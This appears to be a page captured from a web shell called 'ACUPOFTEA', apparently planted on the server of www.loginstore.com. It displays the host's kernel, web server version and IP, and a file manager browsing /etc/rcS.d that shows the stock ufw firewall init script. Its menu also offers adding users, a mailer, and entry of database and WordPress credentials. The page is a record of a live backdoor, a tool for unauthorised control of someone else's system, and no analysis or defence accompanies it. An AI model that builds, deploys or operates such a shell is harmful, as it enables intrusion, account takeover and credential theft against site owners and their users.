System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
200.10.71.112
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
etc
/
rcS.d
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
S01ufw
#!/bin/sh ### BEGIN INIT INFO # Provides: ufw # Required-Start: $local_fs # Required-Stop: $local_fs # Default-Start: S # Default-Stop: 1 # Short-Description: start firewall # Description: Start ufw firewall ### END INIT INFO set -e PATH="/sbin:/bin" [ -d /lib/ufw ] || exit 0 . /lib/lsb/init-functions for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do if [ -s "$s" ]; then . "$s" else log_failure_msg "Could not find $s (aborting)" exit 1 fi done error=0 case "$1" in start) if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then log_action_begin_msg "Starting firewall:" "ufw" output=`ufw_start` || error="$?" if [ "$error" = "0" ]; then log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)" fi if [ ! -z "$output" ]; then echo "$output" | while read line ; do log_action_cont_msg "$line" done fi else log_action_begin_msg "Skip starting firewall:" "ufw (not enabled)" fi log_action_end_msg $error exit $error ;; stop) if [ "$ENABLED" = "yes" ] || [ "$ENABLED" = "YES" ]; then log_action_begin_msg "Stopping firewall:" "ufw" output=`ufw_stop` || error="$?" if [ ! -z "$output" ]; then log_action_cont_msg "$output" fi else log_action_begin_msg "Skip stopping firewall:" "ufw (not enabled)" fi log_action_end_msg $error exit $error ;; restart|force-reload) log_action_begin_msg "Reloading firewall:" "ufw" output=`ufw_reload` || error="$?" if [ ! -z "$output" ]; then log_action_cont_msg "$output" fi log_action_end_msg $error exit $error ;; status) output=`ufw_status` || error="$?" if [ ! -z "$output" ]; then log_action_cont_msg "$output" fi log_action_end_msg $error exit $error ;; *) echo "Usage: /etc/init.d/ufw {start|stop|restart|force-reload|status}" exit 1 ;; esac exit 0
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-11-27 09:06:56
..
DIR
-
drwxr-xr-x
2026-08-05 06:57:20
K01iscsid
text/x-shellscript
1.47 KB
-rwxr-xr-x
2022-01-19 11:38:12
K01open-iscsi
text/x-shellscript
2.38 KB
-rwxr-xr-x
2022-01-19 11:38:12
S01apparmor
text/x-shellscript
3.65 KB
-rwxr-xr-x
2022-02-23 09:48:59
S01cryptdisks
text/x-shellscript
937 B
-rwxr-xr-x
2022-01-13 09:44:35
S01cryptdisks-early
text/x-shellscript
896 B
-rwxr-xr-x
2022-01-13 09:44:35
S01keyboard-setup.sh
text/x-shellscript
1.44 KB
-rwxr-xr-x
2021-07-24 03:45:19
S01kmod
text/x-shellscript
2 KB
-rwxr-xr-x
2021-01-08 10:42:02
S01lvm2
text/x-shellscript
695 B
-rwxr-xr-x
2021-05-19 10:19:25
S01plymouth-log
text/x-shellscript
760 B
-rwxr-xr-x
2022-02-23 02:19:47
S01procps
text/x-shellscript
959 B
-rwxr-xr-x
2022-02-25 11:32:20
S01screen-cleanup
text/x-shellscript
1.19 KB
-rwxr-xr-x
2021-02-18 08:51:15
S01udev
text/x-shellscript
6.71 KB
-rwxr-xr-x
2023-11-21 08:35:56
S01ufw
text/x-shellscript
2.03 KB
-rwxr-xr-x
2021-09-19 05:07:33
S01x11-common
text/x-shellscript
2.7 KB
-rwxr-xr-x
2021-10-19 09:04:11
~ ACUPOFTEA - www.loginstore.com